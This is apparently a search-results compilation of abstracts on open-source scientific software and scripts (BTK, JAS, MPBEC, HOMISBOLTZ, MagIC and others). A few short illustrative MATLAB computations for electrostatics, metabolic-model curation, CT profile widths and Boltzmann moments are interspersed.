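xlabel('ISR (dB)'); ylabel('bit error rate');
```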
Biomechanical ToolKit: Open-source framework to visualize and process biomechanical data.
Barre, Arnaud; Armand, Stéphane
2014-04-01
C3D file format is widely used in the biomechanical field by companies and laboratories to store motion capture systems data. However, few software packages can visualize and modify the integrality of the data in the C3D file. Our objective was to develop an open-source and multi-platform framework to read, write, modify and visualize data from any motion analysis systems using standard (C3D) and proprietary file formats (used by many companies producing motion capture systems). The Biomechanical ToolKit (BTK) was developed to provide cost-effective and efficient tools for the biomechanical community to easily deal with motion analysis data. A large panel of operations is available to read, modify and process data through C++ API, bindings for high-level languages (Matlab, Octave, and Python), and standalone application (Mokka). All these tools are open-source and cross-platform and run on all major operating systems (Windows, Linux, MacOS X). Copyright © 2014 Elsevier Ireland Ltd. All rights reserved.
Java Application Shell: A Framework for Piecing Together Java Applications
NASA Technical Reports Server (NTRS)
Miller, Philip; Powers, Edward I. (Technical Monitor)
2001-01-01
This session describes the architecture of Java Application Shell (JAS), a Swing-based framework for developing interactive Java applications. Java Application Shell is being developed by Commerce One, Inc. for NASA Goddard Space Flight Center Code 588. The purpose of JAS is to provide a framework for the development of Java applications, providing features that enable the development process to be more efficient, consistent and flexible. Fundamentally, JAS is based upon an architecture where an application is considered a collection of 'plugins'. In turn, a plug-in is a collection of Swing actions defined using XML and packaged in a jar file. Plug-ins may be local to the host platform or remotely-accessible through HTTP. Local and remote plugins are automatically discovered by JAS upon application startup; plugins may also be loaded dynamically without having to re-start the application. Using Extensible Markup Language (XML) to define actions, as opposed to hardcoding them in application logic, allows easier customization of application-specific operations by separating application logic from presentation. Through XML, a developer defines an action that may appear on any number of menus, toolbars, and buttons. Actions maintain and propagate enable/disable states and specify icons, tool-tips, titles, etc. Furthermore, JAS allows actions to be implemented using various scripting languages through the use of IBM's Bean Scripting Framework. Scripted action implementation is seamless to the end-user. In addition to action implementation, scripts may be used for application and unit-level testing. In the case of application-level testing, JAS has hooks to assist a script in simulating end-user input. JAS also provides property and user preference management, JavaHelp, Undo/Redo, Multi-Document Interface, Single-Document Interface, printing, and logging. Finally, Jini technology has also been included into the framework by means of a Jini services browser and the ability to associate services with actions. Several Java technologies have been incorporated into JAS, including Swing, Internal Frames, Java Beans, XML, JavaScript, JavaHelp, and Jini. Additional information is contained in the original extended abstract.
NASA Technical Reports Server (NTRS)
Ensey, Tyler S.
2013-01-01
During my internship at NASA, I was a model developer for Ground Support Equipment (GSE). The purpose of a model developer is to develop and unit test model component libraries (fluid, electrical, gas, etc.). The models are designed to simulate software for GSE (Ground Special Power, Crew Access Arm, Cryo, Fire and Leak Detection System, Environmental Control System (ECS), etc.) before they are implemented into hardware. These models support verifying local control and remote software for End-Item Software Under Test (SUT). The model simulates the physical behavior (function, state, limits and I/O) of each end-item and its dependencies as defined in the Subsystem Interface Table, Software Requirements & Design Specification (SRDS), Ground Integrated Schematic (GIS), and System Mechanical Schematic (SMS). The software of each specific model component is simulated through MATLAB's Simulink program. The intensive model development life cycle is as follows: identify source documents; identify model scope; update schedule; preliminary design review; develop model requirements; update model scope; update schedule; detailed design review; create/modify library component; implement library component references; implement subsystem components; develop a test script; run the test script; develop a user's guide; send the model out for peer review; the model is sent out for verification/validation; if there is empirical data, a validation data package is generated; if there is no empirical data, a verification package is generated; the test results are then reviewed; and finally, the user requests accreditation, and a statement of accreditation is prepared. Once each component model is reviewed and approved, the models are intertwined together into one integrated model. This integrated model is then tested itself, through a test script and autotest, so that it can be concluded that all models work conjointly, for a single purpose. The component I was assigned, specifically, was a fluid component, a discrete pressure switch. The switch takes a fluid pressure input, and if the pressure is greater than a designated cutoff pressure, the switch stops fluid flow.
Simple, Script-Based Science Processing Archive
NASA Technical Reports Server (NTRS)
Lynnes, Christopher; Hegde, Mahabaleshwara; Barth, C. Wrandle
2007-01-01
The Simple, Scalable, Script-based Science Processing (S4P) Archive (S4PA) is a disk-based archival system for remote sensing data. It is based on the data-driven framework of S4P and is used for data transfer, data preprocessing, metadata generation, data archive, and data distribution. New data are automatically detected by the system. S4P provides services such as data access control, data subscription, metadata publication, data replication, and data recovery. It comprises scripts that control the data flow. The system detects the availability of data on an FTP (file transfer protocol) server, initiates data transfer, preprocesses data if necessary, and archives it on readily available disk drives with FTP and HTTP (Hypertext Transfer Protocol) access, allowing instantaneous data access. There are options for plug-ins for data preprocessing before storage. Publication of metadata to external applications such as the Earth Observing System Clearinghouse (ECHO) is also supported. S4PA includes a graphical user interface for monitoring the system operation and a tool for deploying the system. To ensure reliability, S4P continuously checks stored data for integrity. Further reliability is provided by tape backups of disks made once a disk partition is full and closed. The system is designed for low maintenance, requiring minimal operator oversight.
Observing proposals on the Web at the National Optical Astronomy Observatories
NASA Astrophysics Data System (ADS)
Pilachowski, Catherine A.; Barnes, Jeannette; Bell, David J.
1998-07-01
Proposals for telescope time at facilities available through the National Optical Astronomy Observatories can now be prepared and submitted via the WWW. Investigators submit proposal information through a series of HTML forms to the NOAO server, where the information is processed by Perl CGI scripts. PostScript figures and ASCII files may be attached by investigators for inclusion in their proposals using their browser's upload feature. Proposal information is saved on the server so that investigators can return in later sessions to continue work on a proposal and so that collaborators can participate in writing the proposal if they have access to the proposal account name and password. The system provides on-line verification of LaTeX syntax and a spellchecker, and confirms that all sections of the proposal are filled out. Users can request a LaTeX or PostScript copy of their proposal by e-mail, or view the proposal on line. The advantages of the Web-based process for our users are convenience, access to on-line documentation, and the simple interface which avoids direct confrontation with LaTeX. From the NOAO point of view, the advantage is the use of standardized formats and syntax, particularly as we begin to receive proposals for the Gemini telescopes and some independent observatories.
NASA Astrophysics Data System (ADS)
Moreno, R.; Bazán, A. M.
2017-10-01
The main purpose of this work is to study improvements to the learning method of technical drawing and descriptive geometry through exercises with traditional techniques, which are usually solved manually, by applying automated processes assisted by high-level CAD templates (HLCts). Given that an exercise based on traditional procedures can be solved step by step, as detailed in technical drawing and descriptive geometry manuals, CAD applications allow us to do the same and later generalize it by incorporating references. Traditional teaching methods have become obsolete and have been relegated in current curricula; nevertheless, they can be applied in certain automation processes. The use of geometric references (using variables in script languages) and their incorporation into HLCts allows the automation of drawing processes. Instead of repeatedly creating similar exercises or modifying data in the same exercises, users should be able to use HLCts to generate future modifications of these exercises. This paper introduces the automation process for generating exercises based on CAD script files, aided by parametric geometry calculation tools. The proposed method allows us to design new exercises without user intervention. The integration of CAD, mathematics, and descriptive geometry facilitates their joint learning. Automation in the generation of exercises not only saves time but also increases the quality of the statements and reduces the possibility of human error.
NASA Astrophysics Data System (ADS)
France, Lydéric; Nicollet, Christian
2010-06-01
MetaRep is a program based on our earlier program CMAS 3D. It is developed in MATLAB® script. MetaRep's objectives are to visualize and project major element compositions of mafic and pelitic rocks and their minerals in the pseudo-quaternary projections of the ACF-S, ACF-N, CMAS, AFM-K, AFM-S and AKF-S systems. These six systems are commonly used to describe metamorphic mineral assemblages and magmatic evolutions. Each system, made of four apices, can be represented in a tetrahedron that can be visualized in three dimensions with MetaRep; the four tetrahedron apices represent oxides or combinations of oxides that define the composition of the projected rock or mineral. The three-dimensional representation allows one to obtain a better understanding of the topology of the relationships between rocks and minerals. From these systems, MetaRep can also project data in ternary plots (for example, the ACF, AFM and AKF ternary projections can be generated). A functional interface makes it easy to use and does not require any knowledge of MATLAB® programming. To facilitate use, MetaRep loads, from the main interface, data compiled in a Microsoft Excel™ spreadsheet. Although useful for scientific research, the program is also a powerful tool for teaching. We propose an application example that, by using two combined systems (ACF-S and ACF-N), provides strong support for the petrological interpretation.
MPBEC, a Matlab Program for Biomolecular Electrostatic Calculations
NASA Astrophysics Data System (ADS)
Vergara-Perez, Sandra; Marucho, Marcelo
2016-01-01
One of the most used and efficient approaches to compute electrostatic properties of biological systems is to numerically solve the Poisson-Boltzmann (PB) equation. There are several software packages available that solve the PB equation for molecules in aqueous electrolyte solutions. Most of these software packages are useful for scientists with specialized training and expertise in computational biophysics. However, the user is usually required to make several important choices manually, depending on the complexity of the biological system, to successfully obtain the numerical solution of the PB equation. This may become an obstacle for researchers, experimentalists, and students with no special training in computational methodologies. Aiming to overcome this limitation, in this article we present MPBEC, a free, cross-platform, open-source software package that provides non-experts in the field an easy and efficient way to perform biomolecular electrostatic calculations on single-processor computers. MPBEC is a Matlab script based on the Adaptive Poisson-Boltzmann Solver, one of the most popular approaches used to solve the PB equation. MPBEC does not require any user programming, text editing or extensive statistical skills, and comes with detailed user-guide documentation. As a unique feature, MPBEC includes a useful graphical user interface (GUI) application which helps and guides users to configure and set up the optimal parameters and approximations to successfully perform the required biomolecular electrostatic calculations. The GUI also incorporates visualization tools to facilitate users' pre- and post-analysis of structural and electrical properties of biomolecules.
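A standard sanity check for any numerical PB solver is the linearized (Debye-Hückel) solution for a single charged sphere in a symmetric electrolyte, for which the potential is known in closed form. The MATLAB sketch below evaluates that textbook benchmark; it is a generic worked example, not part of MPBEC, and the chosen charge, radius, and ionic strength are arbitrary illustration values.

% Linearized PB (Debye-Hueckel) potential around a charged sphere of radius a:
%   phi(r) = q * exp(-kappa*(r-a)) / (4*pi*eps0*epsr * r * (1 + kappa*a))
% Generic benchmark values (assumptions, not MPBEC defaults).
e    = 1.602176634e-19;      % elementary charge [C]
kB   = 1.380649e-23;         % Boltzmann constant [J/K]
NA   = 6.02214076e23;        % Avogadro number [1/mol]
eps0 = 8.8541878128e-12;     % vacuum permittivity [F/m]
epsr = 78.5;                 % relative permittivity of water
T    = 298.15;               % temperature [K]
I    = 0.15 * 1e3;           % ionic strength: 0.15 mol/L -> mol/m^3
q    = 5 * e;                % net charge of the sphere [C]
a    = 2e-9;                 % sphere radius [m]

kappa = sqrt(2 * NA * e^2 * I / (eps0 * epsr * kB * T));   % inverse Debye length [1/m]
r = linspace(a, a + 5/kappa, 200);                          % radial positions [m]
phi = q .* exp(-kappa .* (r - a)) ./ (4*pi*eps0*epsr .* r .* (1 + kappa*a));

plot(r*1e9, phi*1e3); xlabel('r [nm]'); ylabel('\phi [mV]');
title(sprintf('Debye length = %.2f nm', 1e9/kappa));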
Aung, Hnin W.; Henry, Susan A.
2013-01-01
Genome-scale metabolic models are built using information from an organism's annotated genome and, correspondingly, information on reactions catalyzed by the set of metabolic enzymes encoded by the genome. These models have been successfully applied to guide metabolic engineering to increase production of metabolites of industrial interest. Congruity between simulated and experimental metabolic behavior is influenced by the accuracy of the representation of the metabolic network in the model. In the interest of applying the consensus model of Saccharomyces cerevisiae metabolism for increased productivity of triglycerides, we manually evaluated the representation of fatty acid, glycerophospholipid, and glycerolipid metabolism in the consensus model (Yeast v6.0). These areas of metabolism were chosen because they are tightly interconnected with triglyceride synthesis. Manual curation was facilitated by custom MATLAB functions that return information contained in the model for reactions associated with genes and metabolites within the stated areas of metabolism. Through manual curation, we have identified inconsistencies between information contained in the model and literature knowledge. These inconsistencies include incorrect gene-reaction associations, improper definition of substrates/products in reactions, inappropriate assignments of reaction directionality, nonfunctional β-oxidation pathways, and missing reactions relevant to the synthesis and degradation of triglycerides. Suggestions to amend these inconsistencies in the Yeast v6.0 model can be implemented through a MATLAB script provided in the Supplementary Materials, Supplementary Data S1 (Supplementary Data are available online at www.liebertpub.com/ind). PMID:24678285
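The kind of lookup that supports this sort of manual curation is easy to sketch: list every reaction that involves a given metabolite, along with its gene association and allowed directionality, so the entries can be compared against the literature. The MATLAB helper below is an illustrative sketch only; it assumes the common COBRA Toolbox field conventions (model.S, model.rxns, model.mets, model.grRules, model.lb/ub) rather than reproducing the authors' published functions, and the example metabolite identifier is hypothetical.

% Illustrative curation helper (save as rxnReport.m): print all reactions in a
% COBRA-style model struct that involve a given metabolite ID.
function rxnReport(model, metID)
    m = find(strcmp(model.mets, metID));           % row of the metabolite in S
    if isempty(m), error('Metabolite %s not found.', metID); end
    rxnIdx = find(model.S(m, :) ~= 0);             % reactions with a nonzero coefficient
    for j = rxnIdx
        if model.lb(j) < 0 && model.ub(j) > 0
            direction = 'reversible';
        elseif model.ub(j) > 0
            direction = 'forward only';
        else
            direction = 'reverse only';
        end
        fprintf('%-20s  coeff %+g  %-13s  GPR: %s\n', ...
            model.rxns{j}, full(model.S(m, j)), direction, model.grRules{j});
    end
end

A call such as rxnReport(model, 'triglyceride [cytoplasm]') (metabolite name hypothetical) would then list the candidate reactions whose stoichiometry, gene associations, and directionality can be checked against literature knowledge.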
DOE Office of Scientific and Technical Information (OSTI.GOV)
Jones, K.R.; Fisher, J.E.
1997-03-01
ACE/gr is an XY plotting tool for workstations or X-terminals using X. A few of its features are: user-defined scaling, tick marks, labels, symbols, line styles, and colors; a batch mode for unattended plotting; the ability to read and write parameters used during a session; polynomial regression, splines, running averages, DFT/FFT, and cross-/auto-correlation; and hardcopy support for PostScript, HP-GL, and FrameMaker .mif formats. While ACE/gr has a convenient point-and-click interface, most parameter settings and operations are also available through a command-line interface (found under Files/Commands).
NASA Astrophysics Data System (ADS)
1998-03-01
All the Letters to the Editor in this issue are in the same PostScript or PDF file. Contents: Comment on 'Magnetic and electric field strengths of high voltage power lines and household appliances', José Luis Giordano, Dept. de Ciencia y Tecnología de Materiales y Fluidos, CPSI, Universidad de Zaragoza, Spain; Twins paradox, S R Carson, Norton College, Malton, North Yorkshire, UK; On alternative ways of finding the ratio of specific heats of gases, Tomas Ficker, Physics Department, Technical University of Brno, Czech Republic.
An open source Java web application to build self-contained Web GIS sites
NASA Astrophysics Data System (ADS)
Zavala Romero, O.; Ahmed, A.; Chassignet, E.; Zavala-Hidalgo, J.
2014-12-01
This work describes OWGIS, an open source Java web application that creates Web GIS sites by automatically writing HTML and JavaScript code. OWGIS is configured by XML files that define which layers (geographic datasets) will be displayed on the websites. This project uses several Open Geospatial Consortium standards to request data from typical map servers, such as GeoServer, and is also able to request data from ncWMS servers. The latter allows for the displaying of 4D data stored using the NetCDF file format (widely used for storing environmental model datasets). Some of the features available on the sites built with OWGIS are: multiple languages, animations, vertical profiles and vertical transects, color palettes, color ranges, and the ability to download data. OWGIS main users are scientists, such as oceanographers or climate scientists, who store their data in NetCDF files and want to analyze, visualize, share, or compare their data using a website.
Caryoscope: An Open Source Java application for viewing microarray data in a genomic context
Awad, Ihab AB; Rees, Christian A; Hernandez-Boussard, Tina; Ball, Catherine A; Sherlock, Gavin
2004-01-01
Background Microarray-based comparative genome hybridization experiments generate data that can be mapped onto the genome. These data are interpreted more easily when represented graphically in a genomic context. Results We have developed Caryoscope, which is an open source Java application for visualizing microarray data from array comparative genome hybridization experiments in a genomic context. Caryoscope can read General Feature Format files (GFF files), as well as comma- and tab-delimited files, that define the genomic positions of the microarray reporters for which data are obtained. The microarray data can be browsed using an interactive, zoomable interface, which helps users identify regions of chromosomal deletion or amplification. The graphical representation of the data can be exported in a number of graphic formats, including publication-quality formats such as PostScript. Conclusion Caryoscope is a useful tool that can aid in the visualization, exploration and interpretation of microarray data in a genomic context. PMID:15488149
Harrison, Arnell S.; Dadisman, Shawn V.; Reich, Christopher D.; Wiese, Dana S.; Greenwood, Jason W.; Swarzenski, Peter W.
2007-01-01
In September of 2006, the U.S. Geological Survey conducted geophysical surveys offshore of Fort Lauderdale, FL. This report serves as an archive of unprocessed digital boomer and CHIRP seismic reflection data, trackline maps, navigation files, GIS information, Field Activity Collection System (FACS) logs, observer's logbook, and formal FGDC metadata. Filtered and gained digital images of the seismic profiles are also provided. The archived trace data are in standard Society of Exploration Geophysicists (SEG) SEG-Y format (Barry and others, 1975) and may be downloaded and processed with commercial or public domain software such as Seismic Unix (SU). Example SU processing scripts and USGS software for viewing the SEG-Y files (Zihlman, 1992) are also provided.
Simulation Control Graphical User Interface Logging Report
NASA Technical Reports Server (NTRS)
Hewling, Karl B., Jr.
2012-01-01
One of the many tasks of my project was to revise the code of the Simulation Control Graphical User Interface (SIM GUI) to enable logging functionality to a file. I was also tasked with developing a script that directed the startup and initialization flow of the various LCS software components. This makes sure that a software component will not spin up until all the appropriate dependencies have been configured properly. Also, I was able to assist hardware modelers in verifying the configuration of models after they had been upgraded to a new software version. I developed some code that analyzes the MDL files to determine whether any errors were generated by the upgrade process. Another one of the projects assigned to me was supporting the End-to-End Hardware/Software Daily Tag-up meeting.
CT radiation profile width measurement using CR imaging plate raw data
Yang, Chang‐Ying Joseph
2015-01-01
This technical note demonstrates computed tomography (CT) radiation profile measurement using computed radiography (CR) imaging plate raw data, showing that it is possible to perform the CT collimation width measurement with a single scan without saturating the imaging plate. Previously described methods require careful adjustments to the CR reader settings in order to avoid signal clipping in the CR-processed image. CT radiation profile measurements were taken as part of routine quality control on 14 CT scanners from four vendors. CR cassettes were placed on the CT scanner bed, raised to isocenter, and leveled. Axial scans were taken at all available collimations, advancing the cassette for each scan. The CR plates were processed, and the raw CR data were analyzed using MATLAB scripts to measure collimation widths. The raw-data approach was compared with previously established methodology. The quality control analysis scripts are released as open source under Creative Commons licensing. A log-linear relationship was found between raw pixel value and air kerma, and raw-data collimation width measurements were in agreement with CR-processed, bit-reduced data analyzed using previously described methodology. The raw-data approach, with its intrinsically wider dynamic range, allows improved measurement flexibility and precision. As a result, we demonstrate a methodology for CT collimation width measurements using a single CT scan and without the need for CR scanning parameter adjustments, which is more convenient for routine quality control work. PACS numbers: 87.57.Q-, 87.59.bd, 87.57.uq PMID:26699559
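The measurement reduces to two steps: mapping raw CR pixel values back to relative air kerma through the reported log-linear response, and taking the full width at half maximum (FWHM) of the resulting profile. The MATLAB sketch below illustrates those two steps under that stated log-linear assumption; the synthetic profile, the calibration constants, and the pixel pitch are placeholders, not values from the note.

% Hedged sketch: convert a raw CR pixel-value profile to relative air kerma
% using a log-linear response, PV = a + b*log10(K), then measure the FWHM of
% the radiation profile. All numbers below are illustrative placeholders.
a = 1000; b = 1000; pixelPitch_mm = 0.1;          % assumed calibration and sampling pitch
x = 1:512;
kermaTrue = 100*exp(-((x - 256)/50).^8) + 0.01;   % synthetic near-rectangular exposure
rawLine   = a + b*log10(kermaTrue);               % simulated raw pixel values

kerma = 10.^((rawLine - a)/b);                    % invert the log-linear response
kerma = kerma - min(kerma);                       % remove background pedestal
halfMax = max(kerma)/2;
above = find(kerma >= halfMax);
iL = above(1); iR = above(end);                   % first/last samples above half maximum
xL = (iL-1) + (halfMax - kerma(iL-1)) / (kerma(iL) - kerma(iL-1));   % sub-pixel left edge
xR = iR + (kerma(iR) - halfMax) / (kerma(iR) - kerma(iR+1));         % sub-pixel right edge
fprintf('Collimation width (FWHM): %.2f mm\n', (xR - xL)*pixelPitch_mm);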
NASA Astrophysics Data System (ADS)
Asinari, Pietro
2010-10-01
The homogeneous isotropic Boltzmann equation (HIBE) is a fundamental dynamic model for many applications in thermodynamics, econophysics and sociodynamics. Despite recent hardware improvements, the solution of the Boltzmann equation remains extremely challenging from the computational point of view, in particular by deterministic methods (free of stochastic noise). This work aims to improve a deterministic direct method recently proposed [V.V. Aristov, Kluwer Academic Publishers, 2001] for solving the HIBE with a generic collisional kernel and, in particular, for taking care of the late dynamics of the relaxation towards equilibrium. Essentially (a) the original problem is reformulated in terms of particle kinetic energy (exact particle number and energy conservation during microscopic collisions) and (b) the computation of the relaxation rates is improved by a DVM-like correction, where DVM stands for Discrete Velocity Model (ensuring that the macroscopic conservation laws are exactly satisfied). Both these corrections make it possible to derive very accurate reference solutions for this test case. Moreover, this work aims to distribute an open-source program (called HOMISBOLTZ), which can be redistributed and/or modified for dealing with different applications, under the terms of the GNU General Public License. The program has been purposely designed to be minimal, not only with regard to the reduced number of lines (less than 1000), but also with regard to the coding style (as simple as possible). Program summary: Program title: HOMISBOLTZ. Catalogue identifier: AEGN_v1_0. Program summary URL: http://cpc.cs.qub.ac.uk/summaries/AEGN_v1_0.html. Program obtainable from: CPC Program Library, Queen's University, Belfast, N. Ireland. Licensing provisions: GNU General Public License. No. of lines in distributed program, including test data, etc.: 23 340. No. of bytes in distributed program, including test data, etc.: 7 635 236. Distribution format: tar.gz. Programming language: Tested with Matlab version ⩽6.5; however, in principle, any recent version of Matlab or Octave should work. Computer: All supporting Matlab or Octave. Operating system: All supporting Matlab or Octave. RAM: 300 MBytes. Classification: 23. Nature of problem: The problem consists in integrating the homogeneous Boltzmann equation for a generic collisional kernel in the case of isotropic symmetry, by a deterministic direct method. Difficulties arise from the multi-dimensionality of the collisional operator and from satisfying the conservation of particle number and energy (momentum is trivial for this test case) as accurately as possible, in order to preserve the late dynamics. Solution method: The solution is based on the method proposed by Aristov (2001) [1], but with two substantial improvements: (a) the original problem is reformulated in terms of particle kinetic energy (this allows one to ensure exact particle number and energy conservation during microscopic collisions) and (b) a DVM-like correction (where DVM stands for Discrete Velocity Model) is adopted for improving the relaxation rates (this allows one to satisfy the conservation laws exactly at the macroscopic level, which is particularly important for describing the late dynamics in the relaxation towards equilibrium). Both these corrections make it possible to derive very accurate reference solutions for this test case.
Restrictions: The nonlinear Boltzmann equation is extremely challenging from the computational point of view, in particular for deterministic methods, despite the increased computational power of recent hardware. In this work, only the homogeneous isotropic case is considered, in order to make possible the development of a minimal program (in a simple scripting language) and to allow the user to check the advantages of the proposed improvements beyond Aristov's (2001) method [1]. The initial conditions are assumed to be parameterized according to a fixed analytical expression, but this can be easily modified. Running time: From minutes to hours (depending on the adopted discretization of the kinetic energy space). For example, on a 64-bit workstation with an Intel Core i7-820Q quad-core CPU at 1.73 GHz and 8 MBytes of RAM, the provided test run (with the corresponding binary data file storing the pre-computed relaxation rates) requires 154 seconds. References: V.V. Aristov, Direct Methods for Solving the Boltzmann Equation and Study of Nonequilibrium Flows, Kluwer Academic Publishers, 2001.
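Since the method's central claim is exact conservation of particle number and energy during collisions, a natural check on any candidate distribution is to compare its first moments against the Maxwellian it should relax to. The MATLAB sketch below does that for an isotropic distribution sampled on a kinetic-energy grid; the grid, the initial state, and the normalization are illustrative assumptions, not HOMISBOLTZ's internal discretization.

% Check number and energy moments of an isotropic distribution f(E) on a
% kinetic-energy grid (reduced units, k_B = m = 1). For an isotropic gas the
% moments carry the density-of-states weight sqrt(E):
%   n ~ int f(E) sqrt(E) dE,  n*<E> ~ int f(E) E^(3/2) dE,  <E> = (3/2) T at equilibrium.
E  = linspace(0, 30, 2000);                   % kinetic-energy grid
f0 = exp(-E/0.7) + 0.3*exp(-E/2.5);           % non-equilibrium initial state (two "temperatures")

n    = trapz(E, f0 .* sqrt(E));               % particle-number moment
Ebar = trapz(E, f0 .* E.^1.5) / n;            % mean kinetic energy per particle
T    = 2*Ebar/3;                              % equilibrium temperature implied by <E>

fM = exp(-E/T);                               % Maxwellian with matching moments
fM = fM * n / trapz(E, fM .* sqrt(E));        % (normalized numerically)

fprintf('n:   %.6g (target %.6g)\n', trapz(E, fM.*sqrt(E)), n);
fprintf('<E>: %.6g (target %.6g)\n', trapz(E, fM.*E.^1.5)/n, Ebar);
% In a conservative collision step, the same two integrals evaluated on f(E,t)
% should stay constant to quadrature precision.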
Tool for Merging Proposals Into DSN Schedules
NASA Technical Reports Server (NTRS)
Khanampornpan, Teerapat; Kwok, John; Call, Jared
2008-01-01
A Practical Extraction and Reporting Language (Perl) script called merge7da has been developed to facilitate determination, by a project scheduler in NASA's Deep Space Network, of whether a proposal for use of the DSN could create a conflict with the current DSN schedule. Prior to the development of merge7da, there was no way to quickly identify potential schedule conflicts: it was necessary to submit a proposal and wait a day or two for a response from a DSN scheduling facility. By using merge7da to detect and eliminate potential schedule conflicts before submitting a proposal, a project scheduler saves time and gains assurance that the proposal will probably be accepted. merge7da accepts two input files, one of which contains the current DSN schedule and is in a DSN-standard format called '7da'. The other input file contains the proposal and is in another DSN-standard format called 'C1/C2'. merge7da processes the two input files to produce a merged 7da-format output file that represents the DSN schedule as it would be if the proposal were to be adopted. This 7da output file can be loaded into various DSN scheduling software tools now in use.
Preliminary geologic map of the Big Bear City 7.5' Quadrangle, San Bernardino County, California
Miller, Fred K.; Cossette, Digital preparation by Pamela M.
2004-01-01
This data set maps and describes the geology of the Big Bear City 7.5' quadrangle, San Bernardino County, California. Created using Environmental Systems Research Institute's ARC/INFO software, the data base consists of the following items: (1) a rock-unit coverage and attribute tables (polygon and arc) containing geologic contacts, units and rock-unit labels as annotation which are also included in a separate annotation coverage, bbc_anno (2) a point coverage containing structural point data and (3) a coverage containing fold axes. In addition, the data set includes the following graphic and text products: (1) A PostScript graphic plot-file containing the geologic map, topography, cultural data, a Correlation of Map Units (CMU) diagram, a Description of Map Units (DMU), an index map, a regional geologic and structure map, and an explanation for point and line symbols; (2) PDF files of the Readme (including the metadata file as an appendix), and a screen graphic of the plot produced by the PostScript plot file. The geologic map describes a geologically complex area on the north side of the San Bernardino Mountains. Bedrock units in the Big Bear City quadrangle are dominated by (1) large Cretaceous granitic bodies ranging in composition from monzogranite to gabbro, (2) metamorphosed sedimentary rocks ranging in age from late Paleozoic to late Proterozoic, and (3) Middle Proterozoic gneiss. These rocks are complexly deformed by normal, reverse, and thrust faults, and in places are tightly folded. The geologic map database contains original U.S. Geological Survey data generated by detailed field observation and by interpretation of aerial photographs. The map data was compiled on base-stable cronoflex copies of the Big Bear City 7.5' topographic map, transferred to a scribe-guide and subsequently digitized. Lines, points, and polygons were edited at the USGS using standard ARC/INFO commands. Digitizing and editing artifacts significant enough to display at a scale of 1:24,000 were corrected. Within the database, geologic contacts are represented as lines (arcs), geologic units as polygons, and site-specific data as points. Polygon, arc, and point attribute tables (.pat, .aat, and .pat, respectively) uniquely identify each geologic datum.
NASA Astrophysics Data System (ADS)
Jarboe, N.; Minnett, R.; Koppers, A.; Constable, C.; Tauxe, L.; Jonestrask, L.
2017-12-01
The Magnetics Information Consortium (MagIC) supports an online database for the paleo, geo, and rock magnetic communities ( https://earthref.org/MagIC ). Researchers can upload data into the archive and download data as selected with a sophisticated search system. MagIC has completed the transition from an Oracle-backed, Perl-based, server-oriented website to an ElasticSearch-backed, Meteor-based thick-client technology stack. Using JavaScript on both the server and the client enables increased code reuse and allows many computational operations to be easily offloaded to the client for faster response. On-the-fly data validation, column header suggestion, and online spreadsheet editing are some new features available with the new system. The 3.0 data model, method codes, and vocabulary lists can be browsed via the MagIC website and more easily updated. Source code for MagIC is publicly available on GitHub ( https://github.com/earthref/MagIC ). The MagIC file format is natively compatible with the PmagPy ( https://github.com/PmagPy/PmagPy ) paleomagnetic analysis software. MagIC files can now be downloaded from the database and viewed and interpreted in the PmagPy GUI-based tool, pmag_gui. Changes or interpretations of the data can then be saved by pmag_gui in the MagIC 3.0 data format and easily uploaded to the MagIC database. The rate of new contributions to the database has been increasing, with many labs contributing measurement-level data for the first time in the last year. Over a dozen file format conversion scripts are available for translating non-MagIC measurement data files into the MagIC format for easy uploading. We will continue to work with more labs until the whole community has a manageable workflow for contributing their measurement-level data. MagIC will continue to provide a global repository for archiving and retrieving paleomagnetic and rock magnetic data and, with the new system in place, will be able to respond more quickly to the community's requests for changes and improvements.
NASA Astrophysics Data System (ADS)
Umansky, Moti; Weihs, Daphne
2012-08-01
In many physical and biophysical studies, single-particle tracking is utilized to reveal interactions, diffusion coefficients, active modes of driving motion, dynamic local structure, micromechanics, and microrheology. The basic analysis applied to those data is to determine the time-dependent mean-square displacement (MSD) of particle trajectories and perform time- and ensemble-averaging of similar motions. The motion of particles typically exhibits time-dependent power-law scaling, and only trajectories with qualitatively and quantitatively comparable MSD should be ensemble-averaged. Ensemble-averaging trajectories that arise from different mechanisms, e.g., actively driven and diffusive, is incorrect and can result in inaccurate correlations between structure, mechanics, and activity. We have developed an algorithm to automatically and accurately determine power-law scaling of experimentally measured single-particle MSD. Trajectories can then be categorized and grouped according to user-defined cutoffs of time, amplitudes, scaling exponent values, or combinations thereof. Power-law fits are then provided for each trajectory alongside categorized groups of trajectories, histograms of power laws, and the ensemble-averaged MSD of each group. The codes are designed to be easily incorporated into existing user codes. We expect that this algorithm and program will be invaluable to anyone performing single-particle tracking, be it in physical or biophysical systems. Catalogue identifier: AEMD_v1_0. Program summary URL: http://cpc.cs.qub.ac.uk/summaries/AEMD_v1_0.html. Program obtainable from: CPC Program Library, Queen's University, Belfast, N. Ireland. Licensing provisions: Standard CPC licence, http://cpc.cs.qub.ac.uk/licence/licence.html. No. of lines in distributed program, including test data, etc.: 25 892. No. of bytes in distributed program, including test data, etc.: 5 572 780. Distribution format: tar.gz. Programming language: MATLAB (MathWorks Inc.) version 7.11 (2010b) or higher; the program should also be backwards compatible. The Symbolic Math Toolbox (5.5) is required; the Curve Fitting Toolbox (3.0) is recommended. Computer: Tested on Windows only, yet should work on any computer running MATLAB. In Windows 7, the program should be used as administrator; if the user is not the administrator, the program may not be able to save outputs and temporary outputs to all locations. Operating system: Any supporting MATLAB (MathWorks Inc.) v7.11 / 2010b or higher. Supplementary material: Sample output files (approx. 30 MBytes) are available. Classification: 12. External routines: Several MATLAB subfunctions (m-files), freely available on the web, were used as part of, and included in, this code: count, NaN suite, parseArgs, roundsd, subaxis, wcov, wmean, and the executable pdfTK.exe. Nature of problem: In many physical and biophysical areas employing single-particle tracking, having the time-dependent power laws governing the time-averaged mean-square displacement (MSD) of a single particle is crucial. Those power laws determine the mode of motion and hint at the underlying mechanisms driving motion. Accurate determination of the power laws that describe each trajectory allows categorization into groups for further analysis of single trajectories or ensemble analysis, e.g., ensemble- and time-averaged MSD. Solution method: The algorithm in the provided program automatically analyzes and fits time-dependent power laws to single-particle trajectories, then groups particles according to user-defined cutoffs.
